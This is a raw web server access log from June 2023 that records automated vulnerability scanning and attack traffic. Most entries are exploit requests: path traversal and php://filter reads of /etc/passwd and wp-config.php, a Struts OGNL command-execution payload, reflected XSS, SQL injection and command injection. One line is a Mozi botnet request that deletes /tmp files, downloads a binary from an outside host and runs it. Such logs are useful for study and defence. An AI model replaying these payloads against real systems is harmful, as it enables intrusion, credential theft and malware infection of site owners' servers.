107.189.31.184 - - [17/Jun/2023:01:17:57 +0530] "GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1224
107.189.31.184 - - [17/Jun/2023:01:18:00 +0530] "GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1128
107.189.31.184 - - [17/Jun/2023:01:18:00 +0530] "GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:01:18:03 +0530] "GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1118
107.189.31.184 - - [17/Jun/2023:01:18:03 +0530] "GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:01:18:06 +0530] "GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:01:18:06 +0530] "GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:01:18:09 +0530] "GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:01:18:09 +0530] "GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1086
107.189.31.184 - - [17/Jun/2023:01:18:12 +0530] "GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1224
107.189.31.184 - - [17/Jun/2023:01:18:12 +0530] "GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:01:18:15 +0530] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1136
107.189.31.184 - - [17/Jun/2023:01:18:15 +0530] "GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1128
107.189.31.184 - - [17/Jun/2023:01:18:18 +0530] "GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1118
107.189.31.184 - - [17/Jun/2023:01:18:21 +0530] "GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:01:18:24 +0530] "GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1086
107.189.31.184 - - [17/Jun/2023:01:18:27 +0530] "GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:01:18:30 +0530] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1136
45.79.128.205 - - [17/Jun/2023:01:19:25 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:01:20:15 +0530] "GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:01:20:15 +0530] "GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:01:20:41 +0530] "GET /index.php?controller=../../../../../../../../../../../../../etc/passwd%00&option=com_properties HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:01:20:43 +0530] "GET /index.php?controller=../../../../../../../../../../../../../etc/passwd%00&option=com_properties HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:01:22:09 +0530] "GET /cs/Satellite?cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:01:22:11 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:01:22:11 +0530] "GET /index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:01:22:11 +0530] "GET /cs/Satellite?cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:01:22:12 +0530] "GET /index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:01:22:13 +0530] "GET null null" 400 -
172.104.11.51 - - [17/Jun/2023:01:22:15 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:01:22:27 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 1186
107.189.31.184 - - [17/Jun/2023:01:22:29 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 1186
107.189.31.184 - - [17/Jun/2023:01:22:30 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 1186
107.189.31.184 - - [17/Jun/2023:01:22:31 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 1186
107.189.31.184 - - [17/Jun/2023:01:23:05 +0530] "GET /versa/login.html HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:01:23:06 +0530] "GET /versa/login.html HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:01:23:07 +0530] "POST /versa/login HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:01:23:08 +0530] "POST /versa/login HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:01:26:33 +0530] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 1976
107.189.31.184 - - [17/Jun/2023:01:26:34 +0530] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 1976
198.235.24.231 - - [17/Jun/2023:01:28:39 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:01:31:46 +0530] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:01:31:46 +0530] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:01:31:48 +0530] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:01:31:48 +0530] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 1060
45.128.232.141 - - [17/Jun/2023:01:33:09 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:01:33:55 +0530] "POST /assets/_core/php/profile.php HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:01:33:57 +0530] "POST /assets/_core/php/profile.php HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:01:33:58 +0530] "POST /assets/php/profile.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:01:34:00 +0530] "POST /assets/php/profile.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:01:34:01 +0530] "POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:01:34:03 +0530] "POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:01:37:59 +0530] "GET /.mailmap HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:01:38:00 +0530] "GET /.mailmap HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:01:39:13 +0530] "GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1" 404 1130
107.189.31.184 - - [17/Jun/2023:01:39:13 +0530] "GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1" 404 1130
59.16.45.223 - - [17/Jun/2023:01:39:50 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
78.142.231.117 - - [17/Jun/2023:01:41:02 +0530] "GET / HTTP/1.0" 200 11230
198.98.50.108 - - [17/Jun/2023:01:41:39 +0530] "CONNECT myipb1a.mrrage.xyz:80 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:01:44:18 +0530] "GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:01:44:20 +0530] "GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:01:45:50 +0530] "GET /card_scan.php?CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&No=0000&ReaderNo=0000 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:01:45:51 +0530] "GET /card_scan.php?CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&No=0000&ReaderNo=0000 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:01:52:07 +0530] "GET /OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain) HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:01:52:07 +0530] "GET /OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain) HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:01:52:27 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:01:52:29 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:01:52:33 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:01:52:33 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:01:52:59 +0530] "GET /admin/?id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN&page=requests/view_request HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:01:52:59 +0530] "GET /admin/?id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN&page=requests/view_request HTTP/1.1" 404 1006
112.237.126.212 - - [17/Jun/2023:01:56:41 +0530] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://112.237.126.212:57392/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 1012
107.189.31.184 - - [17/Jun/2023:01:59:43 +0530] "GET /apps HTTP/1.1" 404 1002
107.189.31.184 - - [17/Jun/2023:01:59:43 +0530] "GET /apps HTTP/1.1" 404 1002
107.189.31.184 - - [17/Jun/2023:02:00:56 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:00:56 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:00:58 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:00:58 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:01:00 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:01:00 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:01:27 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:01:28 +0530] "GET null null" 400 -
194.165.16.37 - - [17/Jun/2023:02:01:50 +0530] "-" 400 -
167.248.133.33 - - [17/Jun/2023:02:01:50 +0530] "GET / HTTP/1.1" 200 11250
167.248.133.33 - - [17/Jun/2023:02:01:51 +0530] "GET / HTTP/1.1" 200 11250
167.248.133.33 - - [17/Jun/2023:02:01:52 +0530] "PRI * HTTP/2.0" 505 -
167.248.133.33 - - [17/Jun/2023:02:01:52 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
107.189.31.184 - - [17/Jun/2023:02:01:56 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:01:57 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:02:36 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:02:37 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:02:38 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:02:39 +0530] "GET null null" 400 -
90.151.171.106 - - [17/Jun/2023:02:04:21 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:02:04:21 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:02:04:21 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:02:04:21 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:02:04:26 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [17/Jun/2023:02:04:26 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:02:04:27 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:02:04:27 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:02:07:14 +0530] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:02:07:14 +0530] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:02:07:26 +0530] "GET /.editorconfig HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:02:07:26 +0530] "GET /.editorconfig HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:02:09:34 +0530] "GET /?action=stream HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:09:35 +0530] "GET /?action=stream HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:11:20 +0530] "GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:02:11:20 +0530] "GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:02:12:16 +0530] "GET /parameters.yml HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:02:12:17 +0530] "GET /parameters.yml HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:02:12:18 +0530] "GET /app/config/parameters.yml HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:02:12:19 +0530] "GET /app/config/parameters.yml HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:02:12:20 +0530] "GET /parameters.yml.dist HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:02:12:21 +0530] "GET /parameters.yml.dist HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:02:12:22 +0530] "GET /app/config/parameters.yml.dist HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:02:12:23 +0530] "GET /app/config/parameters.yml.dist HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:02:13:31 +0530] "GET /.msmtprc HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:02:13:31 +0530] "GET /.msmtprc HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:02:14:55 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:02:14:56 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:02:14:57 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:02:14:58 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
179.43.177.244 - - [17/Jun/2023:02:16:21 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:02:17:52 +0530] "GET /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:02:17:53 +0530] "GET /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:02:18:10 +0530] "GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:18:10 +0530] "GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:19:47 +0530] "GET /cgi-bin/kerbynet?Action=x509List&Section=NoAuthREQ&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:02:19:47 +0530] "GET /cgi-bin/kerbynet?Action=x509List&Section=NoAuthREQ&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:02:19:48 +0530] "GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:02:19:48 +0530] "GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:02:20:17 +0530] "GET /zp-core/setup/index.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:02:20:19 +0530] "GET /zp-core/setup/index.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:02:20:20 +0530] "GET /zp/zp-core/setup/index.php HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:02:20:21 +0530] "GET /zp/zp-core/setup/index.php HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:02:20:22 +0530] "GET /gallery/zp-core/setup/index.php HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:02:20:23 +0530] "GET /gallery/zp-core/setup/index.php HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:02:20:25 +0530] "GET /zenphoto/zp-core/setup/index.php HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:02:20:25 +0530] "GET /zenphoto/zp-core/setup/index.php HTTP/1.1" 404 1058
45.128.232.141 - - [17/Jun/2023:02:20:33 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:02:23:09 +0530] "GET /free_time.cgi HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:02:23:09 +0530] "GET /free_time.cgi HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:02:24:07 +0530] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:24:09 +0530] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:25:07 +0530] "POST /patient/search_result.php HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:02:25:08 +0530] "POST /patient/search_result.php HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:02:27:24 +0530] "GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:02:27:26 +0530] "GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1092
84.239.40.231 - - [17/Jun/2023:02:28:24 +0530] "GET / HTTP/1.1" 200 11250
84.239.40.231 - - [17/Jun/2023:02:28:25 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:28:25 +0530] "GET /devices.inc.php?search=True&searchColumn=n.id&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchOption=contains HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:02:28:25 +0530] "GET /devices.inc.php?search=True&searchColumn=n.id&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchOption=contains HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:02:33:49 +0530] "GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_charset_=utf-8&_dc=1615863080856&includeVersions=true HTTP/1.1" 404 1172
107.189.31.184 - - [17/Jun/2023:02:33:50 +0530] "GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_charset_=utf-8&_dc=1615863080856&includeVersions=true HTTP/1.1" 404 1172
107.189.31.184 - - [17/Jun/2023:02:33:51 +0530] "GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_charset_=utf-8&_dc=1615863080856&includeVersions=true HTTP/1.1" 404 1196
107.189.31.184 - - [17/Jun/2023:02:33:52 +0530] "GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_charset_=utf-8&_dc=1615863080856&includeVersions=true HTTP/1.1" 404 1196
107.189.31.184 - - [17/Jun/2023:02:35:05 +0530] "GET /' HTTP/1.1" 404 996
107.189.31.184 - - [17/Jun/2023:02:35:06 +0530] "GET /' HTTP/1.1" 404 996
107.189.31.184 - - [17/Jun/2023:02:39:30 +0530] "GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E] HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:02:39:31 +0530] "GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E] HTTP/1.1" 404 1040
179.43.177.244 - - [17/Jun/2023:02:40:23 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:02:41:39 +0530] "GET /error3?data=';alert('nuclei');//&msg=30 HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:02:41:39 +0530] "GET /error3?data=';alert('nuclei');//&msg=30 HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:02:41:40 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:41:40 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:44:12 +0530] "GET /?mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&mapp_iframe=1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:44:12 +0530] "GET /?mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&mapp_iframe=1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:46:51 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:46:53 +0530] "GET /2RHotybtjInwQKyQJ7ZoVruTgI6 HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:02:46:53 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:02:46:56 +0530] "GET /2RHotybtjInwQKyQJ7ZoVruTgI6 HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:02:47:44 +0530] "GET /system/console HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:02:47:49 +0530] "GET /system/console HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:02:48:03 +0530] "POST /appInfo/assert HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:02:48:04 +0530] "POST /appInfo/assert HTTP/1.1" 404 1022
103.217.244.165 - - [17/Jun/2023:02:49:12 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:02:49:34 +0530] "GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:49:35 +0530] "GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:50:06 +0530] "GET /%5C../ssl/yaws-key.pem HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:02:50:08 +0530] "GET /%5C../ssl/yaws-key.pem HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:02:50:38 +0530] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 1212
107.189.31.184 - - [17/Jun/2023:02:50:39 +0530] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 1212
45.128.232.141 - - [17/Jun/2023:02:50:56 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:02:53:47 +0530] "GET /version.web HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:02:53:48 +0530] "GET /version.web HTTP/1.1" 404 1016
162.221.192.26 - - [17/Jun/2023:02:54:45 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:02:55:49 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:02:55:49 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:02:55:52 +0530] "GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:02:55:53 +0530] "GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1" 404 1034
90.151.171.108 - - [17/Jun/2023:02:55:54 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:02:55:54 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:02:56:04 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:02:56:04 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:02:56:05 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:02:56:05 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:02:56:32 +0530] "GET /filezilla.xml HTTP/1.1" 404 1020
